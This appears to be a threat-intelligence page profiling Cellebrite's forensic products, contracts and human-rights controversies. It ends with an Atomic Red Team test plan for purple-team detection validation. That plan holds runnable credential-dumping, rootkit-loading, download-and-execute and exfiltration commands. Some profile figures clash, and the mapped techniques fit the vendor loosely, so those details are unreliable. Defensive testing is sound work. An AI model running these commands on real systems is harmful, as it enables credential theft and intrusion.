cellebrite

Home/Threat Actor/Cellebrite

Threat Actor

cellebrite · israel_private_sector_mobile_forensics_cyber_mercenary · active since 1999

Cellebrite (canonical company naming, Cellebrite DI Ltd legal entity, originally founded 1999 as Cellebrite Mobile Synchronization, headquartered Petach Tikva Israel) is an Israeli mobile-forensics company, a subsidiary of Japanese Sun Corporation (~45% ownership since 2007 acquisition) that IPO'd on NASDAQ August 31, 2021 post-NSO-Pegasus-controversies.

the 6th cyber-mercenary cluster in this curated corpus following NSO + Candiru + Intellexa + Paragon + QuaDream (Israeli) + DarkMatter (UAE), with cluster-defining mobile-forensics physical-device-extraction mission profile operationally complementary to rather than overlapping with sibling clusters' remote zero-click compromise capability (per The Intercept: "The company doesn't help governments remotely hack into phones for real-time surveillance, as the NSO Group, another Israeli firm, reportedly does.

Cellebrite focuses only on forensics, collecting data and artifacts already created and stored on phones. Physical access to the phone is required for their work")

flagship UFED Universal Forensic Extraction Device product line since 2007 (UFED + UFED Touch + UFED 4PC + UFED Pro + UFED Premium 2019 with iOS 12.3+ and Android Galaxy S9 unlock capability claims + UFED Ultimate variants) + Physical Analyzer parsing/indexing software.

comprehensive device data extraction (contacts + locations + deleted messages + calls + app-collected data + GPS device data + SIM card + iOS keychain decryption + Apple T2 security chip Mac extraction, only tool on market capability per AFSC)

~50% global digital forensics market share per CEO Yossi Carmil + ~150 countries customer base + 8,000+ supported mobile phone models.

massive US federal customer portfolio per AFSC canonical contract documentation: ICE 213 contracts $48.6M+ 2008-April 2025 (largest customer + "digital border wall" warrantless border searches) + CBP $6.1M+ 2009-2024 + DOJ 839 contracts $15.4M+ as of August 2024 + FBI contracts since September 2009 + DEA + Secret Service + Navy + 4 state Departments of Public Safety + 7+ California cities + multi-state police departments.

multiple documented authoritarian-regime + human-rights controversies including Myanmar Reuters journalists Rohingya massacre coverage 2018 (Cellebrite ceased Myanmar sales 2018 post-scandal) + Hong Kong pro-democracy protests 2019 + Botswana journalist Dikologang April 2020 + Bangladesh RAB extrajudicial killings 2021 (Cellebrite ceased RAB sales) + Belarus + Russia political opposition (Lyubov Sobol affair - Jerusalem activist Israeli Supreme Court lawsuit March 2021) + Serbia + NoviSpy spyware coordination per Amnesty International December 2024 report (Serbian police used Cellebrite UFED to bypass security on journalist Slaviša Milanov + environmental activists then installed NoviSpy domestic spyware, Cellebrite halted Serbia sales February 2025); signature Signal Moxie Marlinspike April 2021 vulnerability disclosure detailing arbitrary code execution vulnerabilities in UFED + Physical Analyzer (outdated 2012 FFmpeg DLL files lacking 100+ subsequent security updates + Windows installer packages extracted from Apple iTunes signed by Apple raising legal concerns)

Apple-FBI San Bernardino 2016 controversy boosted reputation (though Cellebrite involvement remained unconfirmed)

2024 high-profile use case Trump assassination attempt Crooks phone unlock in 40 minutes per Drop Site News reporting; Cellebrite Federal Solutions subsidiary 2024 for closer US federal engagement + $1.7M lobbying spend 2021-2024 via Alpine Group.

no-resale policy violated via eBay + dark-web ($6,000 list price products resold for ~$100 sometimes with prior case data per Itempnews Project investigation)

fills the 6th cyber-mercenary cell in the curated corpus, operationally completing cyber- mercenary capability coverage with mobile-forensics capability axis distinct from remote zero-click sibling clusters.

israel_private_sector_mobile_forensics_cyber_mercenary confidence: high 18 aliases

Sigma rules200 YARA rules0 Live IOCs0 CVEs exploited0

⬢

Profile

Cellebrite (canonical company naming, Cellebrite DI Ltd legal entity) is an Israeli mobile-forensics company headquartered Petach Tikva (Tel Aviv suburb), a subsidiary of Japanese Sun Corporation (~45% ownership) that IPO'd on NASDAQ August 31, 2021. The 6th cyber- mercenary cluster in this curated corpus following NSO + Candiru + Intellexa + Paragon + QuaDream + DarkMatter UAE. Cluster-defining distinction: Cellebrite focuses exclusively on mobile-device forensic extraction requiring physical device access, operationally complementary to (rather than overlapping with) sibling cyber-mercenary clusters' remote zero-click compromise capability. Per The Intercept: "The company doesn't help governments remotely hack into phones for real- time surveillance, as the NSO Group, another Israeli firm, reportedly does.

Cellebrite focuses only on forensics, collecting data and artifacts already created and stored on phones. Physical access to the phone is required for their work." Operational phases: (1) FOUNDING (1999). Originally Cellebrite Mobile Synchronization (cellular data transfer tool). (2) SUN CORPORATION ACQUISITION (2007). Japanese parent 80% (now ~45%) ownership. (3) UFED LAUNCH (2007). Universal Forensic Extraction Device flagship product. (4) US FEDERAL EXPANSION (2007+). DEA + Secret Service + Navy first contracts. (5) APPLE-FBI SAN BERNARDINO CONTROVERSY (March 2016). Reputation-building reporting. (6) ICE MAJOR CONTRACTS (2017+). $48.6M+ ICE relationship. (7) UFED PREMIUM TIER LAUNCH (2019). iOS 12.3 + Android Galaxy S9 unlock capability claims. (8) MULTIPLE AUTHORITARIAN-REGIME CONTROVERSIES (2018- 2024). Myanmar + Hong Kong + Botswana + Bangladesh + Belarus + Russia + Serbia documented use. (9) SIGNAL MOXIE MARLINSPIKE VULNERABILITY DISCLOSURE (April 2021). UFED + Physical Analyzer arbitrary code execution vulnerabilities. (10) NASDAQ IPO (August 31, 2021). Post-NSO Pegasus controversies timing. (11) TRUMP ASSASSINATION ATTEMPT CROOKS PHONE UNLOCK (July 2024). 40-minute unlock demonstration. (12) CELLEBRITE FEDERAL SOLUTIONS SUBSIDIARY (2024) + SERBIA NOVISPY AMNESTY INTERNATIONAL DISCLOSURE (December 2024).

Signature operational tradecraft

Mobile-forensics physical-device-extraction mission profile (cluster-defining): physical access required.
UFED flagship product line: Touch + 4PC + Pro + Premium + Ultimate variants.
Physical Analyzer parsing software: dual-part extraction + analysis architecture.
Logical + Physical extraction modes: unlocked device quick extraction vs. locked device complex extraction.
Comprehensive device data extraction: contacts + locations + deleted messages + calls + app data + GPS + SIM + browser data + keychain decryption.
Apple T2 security chip Mac extraction: only tool on market capability per AFSC.
Massive US federal customer portfolio: ICE $48.6M+ + CBP $6.1M+ + DOJ $15.4M+ + FBI + DEA + Secret Service + Navy + state + local law enforcement.
~150 countries customer base + ~50% global digital forensics market share per CEO Yossi Carmil.
Sun Corporation Japanese parent ownership (signature distinct from purely-Israeli sibling clusters).
NASDAQ public listing (signature distinct from private sibling clusters).
Authoritarian-regime use documented controversies: Myanmar Reuters journalists (2018), Hong Kong protests (2019), Botswana journalist (April 2020), Bangladesh RAB extrajudicial killings (2021), Belarus + Russia political opposition (Lyubov Sobol March 2021), Serbia + NoviSpy spyware coordination (Amnesty International December 2024).
Signal Moxie Marlinspike April 2021 vulnerability disclosure: arbitrary code execution + outdated 2012 FFmpeg DLL + Apple iTunes signed Windows installer packages legal concerns.
No-resale policy violated via eBay + dark-web: $6,000 list price products resold for ~$100 sometimes with prior case data per Itempnews Project. The cluster fills the 6th cyber-mercenary cell in the curated corpus, operationally completing cyber-mercenary capability coverage with mobile-forensics capability axis distinct from remote zero-click sibling clusters.

☉

Aliases

cellebritecellebrite_dicellebrite di ltdcellebrite_mobile_synchronizationufeduniversal forensic extraction deviceufed_touchufed_4pcufed_proufed_premiumufed_ultimatephysical_analyzercellebrite_federal_solutionscellebrite ufedcellebrite israeli mobile forensicscellebrite physical analyzercellebrite sun corp subsidiarycellebrite ice fbi cbp dhs contractor

⌖

Notable Campaigns

2024-2025Serbia NoviSpy Amnesty International Disclosure (December 2024)
2024Cellebrite Federal Solutions Subsidiary (2024)
2024Trump Assassination Attempt Crooks Phone Unlock (July 2024)
2021Signal Moxie Marlinspike UFED Vulnerability Disclosure (April 2021)
2021Cellebrite NASDAQ IPO (August 31, 2021)
2021Bangladesh RAB Extrajudicial Killings (2021)
2020Botswana Journalist Dikologang (April 2020)
2019UFED Premium 2019 Launch, iOS + Android Unlock Capability
2019Hong Kong Pro-Democracy Protests (2019)
2018Myanmar Reuters Journalists Rohingya Coverage (2018)
2017ICE First Major Contract (2017)
2016Apple-FBI San Bernardino iPhone Controversy (March 2016)
2014-2021Belarus + Russia Political Opposition Targeting (March 2021)
2011ACLU Michigan State Police FOIA Action (April 2011)
2007First US Federal Contracts, DEA + Secret Service + Navy (Late 2007)
2007UFED Universal Forensic Extraction Device Launch (2007)
2007Sun Corporation Japanese Acquisition (2007)
1999Cellebrite Founding (1999)

★

Attribution & Reporting

Attributed by

Cellebrite official corporate documentation + financial filings (NASDAQ IPO August 2021)Yossi Carmil (Cellebrite CEO, public statements)Leeor Ben-Peretz (Cellebrite executive vice president of products and business development)American Friends Service Committee (AFSC) Investigate (canonical contract documentation compilation)The Intercept (canonical Cellebrite investigative journalism, "When the FBI Has a Phone It Can't Crack, It Calls These Israeli Hackers" November 2016)Signal / Moxie Marlinspike (canonical UFED vulnerability disclosure April 2021)Stanford Cyberlaw (canonical Signal-Cellebrite legal analysis May 2021)Drop Site News (Israeli Digital Intelligence Firm Aims to Become Top U.S. Contractor 2024)MintPress News (canonical Israeli cyber-mercenary analysis)Itempnews Project (canonical Cellebrite resale + dark-web availability investigation)Amnesty International (canonical Serbia + NoviSpy spyware coordination disclosure December 2024)Committee to Protect Journalists (canonical journalist-targeting documentation)Citizen Lab (adjacent mobile-spyware industry research)ACLU (Michigan State Police 2008 FOIA action + 2017 CBP/ICE warrantless border searches lawsuit)Access Now (Krapiva canonical surveillance technology regulation advocacy)Israeli Supreme Court (Jerusalem activist lawsuit March 2021)Yedioth Ahronoth (Israeli media, Apple/FBI San Bernardino reporting March 2016)Haaretz (Israeli media, canonical industry coverage)

Key reporting

reportCellebrite official corporate documentation + NASDAQ financial filings (post-August 31, 2021 IPO)

reportThe Intercept (Cora Currier + Morgan Marquis-Boire): When the FBI Has a Phone It Can't Crack, It Calls These Israeli Hackers (November 2016), canonical Cellebrite investigative journalism

reportMoxie Marlinspike (Signal): Cellebrite UFED + Physical Analyzer vulnerability disclosure (April 21, 2021), canonical vulnerability disclosure

reportRiana Pfefferkorn (Stanford Cyberlaw): I Have a Lot to Say About Signal's Cellebrite Hack (May 12, 2021), canonical Signal-Cellebrite legal analysis

reportHaaretz: Stop Using Cellebrite, Israeli, U.K. Police Urged to Stop Using Phone-hacking Tech (April 25, 2021)

reportAFSC Investigate: Cellebrite DI Ltd, canonical contract documentation + human rights compilation

reportDrop Site News: Israeli Digital Intelligence Firm Aims to Become Top U.S. Contractor (2024), canonical recent industry analysis

reportVice Motherboard (Joseph Cox): Meet Cellebrite, the Israeli Company Reportedly Cracking iPhones for the FBI (2016)

reportMintPress News: Cellebrite, Israel's Good Cyber Cop is Big Tech's Backdoor to Breaching Your Privacy (February 2021)

reportItempnews Project: Behind the Resale of Cellebrite Technology That Can Hack Your Phone (February 2022), canonical resale + dark-web availability investigation

reportAmnesty International: Serbia Cellebrite + NoviSpy spyware coordination report (December 2024), canonical most-recent controversy disclosure

reportCommittee to Protect Journalists: Botswana + Hong Kong + Myanmar journalist targeting documentation

reportCitizen Lab: Adjacent mobile-spyware industry research context

reportYedioth Ahronoth + Haaretz: Apple-FBI San Bernardino + Israeli media canonical industry coverage

13 source links

https://en.wikipedia.org/wiki/Cellebrite

https://en.wikipedia.org/wiki/Cellebrite_UFED

https://theintercept.com/2016/10/31/fbis-go-hackers/

https://cyberlaw.stanford.edu/blog/2021/05/i-have-lot-say-about-signals-cellebrite-hack/

https://www.haaretz.com/israel-news/tech-news/2021-04-25/ty-article/.premium/israeli-u-k-police-urged-to-stop-using-cellebrite-phone-hacking-tech/0000017f-e697-dc7e-adff-f6bf8aed0000

https://investigate.afsc.org/company/cellebrite-di

https://www.dropsitenews.com/p/israel-digital-intelligence-cellebrite-gaza

https://www.mintpressnews.com/cellebrite-spyware-israel-privacy/274854/

https://www.itempnews.org/2022/02/20/cellebrite-hacking/

https://www.vice.com/en/article/meet-cellebrite-the-israeli-company-reportedly-cracking-iphones-for-the-fbi/

https://signal.org/blog/cellebrite-vulnerabilities/

https://www.amnesty.org/

https://www.cellebrite.com/

⬡

Operational

State sponsor

Private-sector Israeli mobile-forensics company (not directly state-sponsored, though deeply integrated with US + Israeli + global law enforcement + intelligence service customer base). Operationally distinct from sibling Israeli cyber-mercenary clusters (NSO + Candiru + Paragon + QuaDream + DarkMatter UAE) through cluster- defining mobile-forensics physical-device-extraction mission profile rather than remote zero-click compromise capability.

Corporate ownership + structure

Headquartered Petach Tikva (small city east of Tel Aviv), Israel.
Subsidiary of Sun Corporation (Japanese, original video-game publisher Sunsoft), which took 80% ownership in 2007 (current ~45% shareholder per AFSC)
IPO'd on NASDAQ August 31, 2021 (post-NSO Pegasus controversies July 2021)
2024 revenue: $246M (2021), $15.3M US federal contracts alone.
~520 employees (most in Israel including manufacturing facility in southern Israel)
Founded 1999 originally as cellular phone data transfer tool company.
CEO Yossi Carmil (founding-era executive)
CTO Leeor Ben-Peretz (executive vice president of products and business development for mobile forensics)
Israeli intelligence community ties (multiple former Mossad + Unit 8200 personnel)
Cellebrite Federal Solutions subsidiary (2024) for closer US federal engagement.
$1.7M lobbying spend 2021-2024 per Drop Site News Operational mission profile: Mobile-device forensic data extraction for law enforcement + intelligence + border control + military + private corporate investigation customers in ~150 countries. Per Cellebrite documentation: supports intelligence services + border patrols + special and military forces + financial organizations. Per The Intercept characterization: "The company doesn't help governments remotely hack into phones for real-time surveillance, as the NSO Group, another Israeli firm, reportedly does; Cellebrite focuses only on forensics, collecting data and artifacts already created and stored on phones. Physical access to the phone is required for their work." Operationally complementary rather than overlapping with sibling cyber-mercenary cluster capability.

Product capability profile

UFED (Universal Forensic Extraction Device) flagship since 2007, portable hardware tool for cell phone content extraction.
UFED Premium 2019, claims iOS 12.3+ + Android Galaxy S9 unlock capability.
Physical Analyzer, parsing and indexing software for extracted data.
"Logical extraction", quick + easy + requires unlocked device.
"Physical extraction", slower + complex + works on locked devices (not 100% reliability)
8,000+ different mobile phone models supported per Cellebrite documentation.
Extracts: contacts + locations + deleted messages + calls + app-collected data + GPS device data + SIM card data + browser data.
Only tool on market capable of extracting data from Mac devices with Apple T2 security chip per AFSC.
Single UFED supports up to 3,000 phones per AFSC US federal government customer profile (signature): Per AFSC Investigate canonical compilation:.
ICE (Immigration and Customs Enforcement): 213 contracts $48.6M+ 2008-April 2025 (largest customer)
CBP (Customs and Border Protection): $6.1M+ 2009-2024 ("digital border wall", warrantless border searches)
DOJ (Department of Justice): 839 contracts $15.4M+ as of August 2024 (federal prison + police agencies)
FBI: contracts since September 11, 2009 + Apple-FBI San Bernardino 2016 controversy + Trump assassination attempt phone unlock 2024.
DEA + Secret Service + Navy: contracts since late 2007.
State-level: Arizona + Iowa + Illinois + New Jersey Departments of Public Safety.
Local-level: 7+ California cities + Delaware + Florida + Maine + Missouri + Pennsylvania + Rhode Island + Wisconsin police departments.
230+ federal contracts cumulative since 2007 Documented authoritarian-regime + human-rights- controversy use:.
Myanmar (2018): Cellebrite UFED used to hack phones of two Reuters journalists who uncovered Rohingya massacre evidence; journalists convicted on secrecy law charges. Cellebrite told NYT it had stopped selling to Myanmar in 2018.
Hong Kong (2019): Chinese officials used Cellebrite to hack pro-democracy demonstrator phones during anti-extradition protests per The Intercept.
Botswana (April 2020): Officials used UFED to extract thousands of messages + images + audio from journalist Oratile Dikologang's phone during COVID-19 information-suppression arrest.
Bangladesh RAB (Rapid Action Battalion): software sold to RAB; after 2021 report linking RAB extrajudicial killings to Cellebrite, company announced ceasing sales to RAB.
Belarus + Russia (~2014-2021): technology used to persecute democratic opposition; Vladimir Putin used against political opponents including Lyubov Sobol affair (March 2021.
Jerusalem activist lawsuit against Cellebrite in Israeli Supreme Court).
Serbia (December 2024): Amnesty International reported Serbian police used Cellebrite UFED to bypass security on journalist Slaviša Milanov's Android device + environmental activists' devices, then installed NoviSpy domestic spyware on targeted devices. Cellebrite halted Serbia sales February 2025.
Hong Kong + China + UAE + Venezuela + multiple authoritarian regimes: documented or alleged use. Operational significance: Cellebrite represents the largest mobile-forensics vendor in the publicly-tracked private-sector cyber- mercenary ecosystem per industry analysis, ~50% of global digital forensics market share per CEO Yossi Carmil + 150-country customer base + dominant US federal customer relationships. Operationally distinct from sibling Israeli cyber-mercenary clusters through mission profile (forensic extraction vs. remote zero- click compromise) + customer profile (law enforcement + border + immigration broad vs. intelligence services narrow) + public listing (NASDAQ IPO vs. private equity). The cluster fills the 6th cyber-mercenary cell in this curated corpus, completing the cyber-mercenary capability cell coverage with mobile-forensics capability axis.

Motivations

mobile_device_forensic_extraction_capability_provision_for_law_enforcement_intelligence_customers, largest_global_digital_forensics_market_share_vendor_capability, massive_us_federal_government_contractor_relationship_ice_cbp_doj_fbi, 150_country_customer_base_law_enforcement_intelligence_border_military_corporate, signature_japanese_sun_corp_parent_ownership_structure, cluster_defining_physical_device_extraction_mission_profile_vs_remote_zero_click_siblings, signature_nasdaq_public_listing_august_2021_post_nso_pegasus_controversies, signature_authoritarian_regime_use_documented_controversies_myanmar_hong_kong_botswana_bangladesh_belarus_russia_serbia

Sectors

mobile_device_holders_in_law_enforcement_custody immigrants_at_us_border criminal_suspects_with_seized_devices journalists_in_authoritarian_regime_custody human_rights_activists_in_authoritarian_regime_custody political_dissidents_in_authoritarian_regime_custody pro_democracy_demonstrators_hong_kong_2019 reuters_journalists_myanmar_rohingya_coverage_2018 environmental_activists_serbia_2024

Regions

global_150_countries united_states israel united_kingdom hong_kong myanmar botswana bangladesh belarus russia serbia united_arab_emirates venezuela china thailand

◈

Detection Blind Spots

60 techniques

Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.

Behavioral / log (Sigma)47/60 · 78%

Analytics (MITRE CAR)22/60 · 36%

Runtime / container (Falco)7/60 · 11%

File / malware (YARA)2/60 · 3%

Network (Suricata/Snort)9/60 · 15%

Vuln scan (Nuclei)0/60 · 0%

▸

Atomic Test Plan

30 techniques

Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

T1003 OS Credential Dumping · 7 tests

command_promptelevatedwindowsGsecdump

"#{gsecdump_exe}" -a

powershellelevatedwindowsCredential Dumping with NPPSpy

Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"

powershellelevatedwindowsDump svchost.exe to gather RDP credentials

$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /config

powershellwindowsDump Credential Manager using keymgr.dll and rundll32.exe

rundll32.exe keymgr,KRShowKeyMgr

powershellwindowsSend NTLM Hash with RPC Test Connection

rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null

T1003.002 Security Account Manager · 8 tests

command_promptelevatedwindowsRegistry dump of SAM, creds, and secrets

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

command_promptelevatedwindowsRegistry parse with pypykatz

"#{venv_path}\Scripts\pypykatz" live lsa

command_promptelevatedwindowsesentutl.exe SAM copy

esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}

powershellelevatedwindowsPowerDump Hashes and Usernames from Registry

Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump

command_promptwindowsdump volume shadow copy hives with certutil

for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*

powershellwindowsdump volume shadow copy hives with System.IO.File

1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}

powershellwindowsWinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive

command_promptelevatedwindowsDumping of SAM, creds, and secrets(Reg Export)

reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security

T1003.008 /etc/passwd and /etc/shadow · 5 tests

bashelevatedlinuxAccess /etc/shadow (Local)

sudo cat /etc/shadow > #{output_file}
cat #{output_file}

shelevatedlinuxAccess /etc/master.passwd (Local)

sudo cat /etc/master.passwd > #{output_file}
cat #{output_file}

shlinuxAccess /etc/passwd (Local)

cat /etc/passwd > #{output_file}
cat #{output_file}

shelevatedlinuxAccess /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat

unamestr=$(uname)
if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; fi

shelevatedlinuxAccess /etc/{shadow,passwd,master.passwd} with shell builtins

testcat(){ (while read line; do echo $line >> #{output_file}; done < $1) }
[ "$(uname)" = 'FreeBSD' ] && testcat /etc/master.passwd
testcat /etc/passwd
testcat /etc/shadow

T1005 Data from Local System · 3 tests

powershellwindowsSearch files of interest and save them to a single zip file (Windows)

$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}" 
$fileExtensions = $fileExtensionsString -split ", "

New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}

$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

  Write-Host "Zip file created: $outputZip\data.zip"
  } else {
      Write-Host "No files found with the specified extensions."
  }

bashlinuxFind and dump sqlite databases (Linux)

cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;

shmacosCopy Apple Notes database files using AppleScript

osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'

T1006 Direct Volume Access · 1 test

powershellelevatedwindowsRead volume boot sector via DOS device path (PowerShell)

$buffer = New-Object byte[] 11
$handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', 'Read', 'ReadWrite'
$handle.Read($buffer, 0, $buffer.Length)
$handle.Close()
Format-Hex -InputObject $buffer

T1010 Application Window Discovery · 1 test

command_promptwindowsList Process Main Windows - C# .NET

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}"
#{output_file_name}

T1014 Rootkit · 4 tests

shelevatedlinuxLoadable Kernel Module based Rootkit

sudo insmod #{rootkit_path}/#{rootkit_name}.ko

shelevatedlinuxLoadable Kernel Module based Rootkit

sudo modprobe #{rootkit_name}

shelevatedlinuxdynamic-linker based rootkit (libprocesshider)

echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"

shelevatedlinuxLoadable Kernel Module based Rootkit (Diamorphine)

sudo modprobe #{rootkit_name}
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"

T1020 Automated Exfiltration · 2 tests

powershellwindowsIcedID Botnet HTTP PUT

$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}

powershellwindowsExfiltration via Encrypted FTP

$sampleData = "Sample data for exfiltration test"
Set-Content -Path "#{sampleFile}" -Value $sampleData
$ftpUrl = "#{ftpServer}"
$creds = Get-Credential -Credential "#{credentials}"
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds

T1025 Data from Removable Media · 1 test

command_promptwindowsIdentify Documents on USB and Removable Media via PowerShell

powershell.exe -c "Get-Volume | Where-Object {$_.DriveType -eq 'Removable'} | ForEach-Object { Get-ChildItem -Path ($_.DriveLetter + ':\*') -Recurse -Include '*.doc*','*.xls*','*.txt','*.pdf' -ErrorAction SilentlyContinue | ForEach-Object {Write-Output $_.FullName} } ; if (-not (Get-Volume | Where-Object {$_.DriveType -eq 'Removable'})) { Write-Output 'No removable media.' }"

T1027 Obfuscated Files or Information · 11 tests

shmacos, linuxDecode base64 Data into Script

if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh

powershellwindowsExecute base64-encoded PowerShell

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand

powershellwindowsExecute base64-encoded PowerShell from Windows Registry

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"

command_promptwindowsExecution from Compressed File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over email

Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over HTTP

Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"

powershellwindowsObfuscated Command in PowerShell

$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )

manualwindowsObfuscated Command Line using special Unicode characters

powershellelevatedwindowsSnake Malware Encrypted crmlog file

$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"

